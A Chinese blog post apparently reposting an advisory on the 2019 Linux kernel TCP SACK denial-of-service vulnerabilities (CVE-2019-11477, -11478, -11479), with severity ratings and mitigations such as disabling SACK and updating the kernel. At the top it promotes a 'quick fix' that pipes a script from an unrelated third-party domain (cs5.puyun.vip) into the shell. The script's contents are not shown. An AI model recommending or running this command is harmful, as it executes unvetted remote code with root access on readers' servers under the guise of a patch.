Linux 内核TCP SACK机制远程拒绝服务漏洞

快捷修复方式:

解决方法:

```curl http://cs5.puyun.vip/yum.sh | sh```


linux修复最新漏洞的脚本,可以在业务空闲的时候运行,业务在跑的时候不要运行 非linux 系统请忽略。

修复完毕请用命令reboot重启服务器

2019618日,阿里云应急响应中心监控到国外某安全研究组织披露Linux 内核TCP SACK机制存在缺陷,可导致远程拒绝服务。CVE编号为CVE-2019-11477CVE-2019-11478CVE-2019-11479

漏洞描述

Linux 内核2.6.29及之后版本在处理TCP SACK机制时存在缺陷,导致整数溢出漏洞,攻击者可以构造特定的SACK包,远程触发Linux服务器内核模块溢出漏洞,实现远程拒绝服务攻击。

漏洞评级

CVE-2019-11477 高危

CVE-2019-11478 中危

CVE-2019-11479 中危

安全修复建议

注:以下任意一种修复方式都有可能造成业务不可用

一、禁用SACK机制功能,执行如下命令:

echo 0 > /proc/sys/net/ipv4/tcp_sack
sysctl -w net.ipv4.tcp_sack=0

二、升级Linux安全补丁(需要重启服务器)

Ubuntu 系列:apt-get update && sudo apt-get install linux-image-generic

Centos 系列:yum update kernel 或 使用云安全中心漏洞一键修复功能,如下:

Linux 内核TCP SACK机制远程拒绝服务漏洞 第2张插图

Linux 内核TCP SACK机制远程拒绝服务漏洞 第3张插图

其他Linux 补丁可参考:
https://github.com/Netflix/security-bulletins/tree/master/advisories/third-party/2019-001

免责声明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络收集整理,如果您喜欢该程序和内容,请支持正版,购买注册,得到更好的正版服务。我们非常重视版权问题,如有侵权请邮件与我们联系处理。敬请谅解!
如若转载,请注明出处:https://www.zxki.cn/936.html

上一篇 2019-6-17 11:06
下一篇 2019-6-21 09:00

相关推荐

发表评论

为了防止灌水评论,登录后即可评论!

还没有评论,快来抢沙发吧!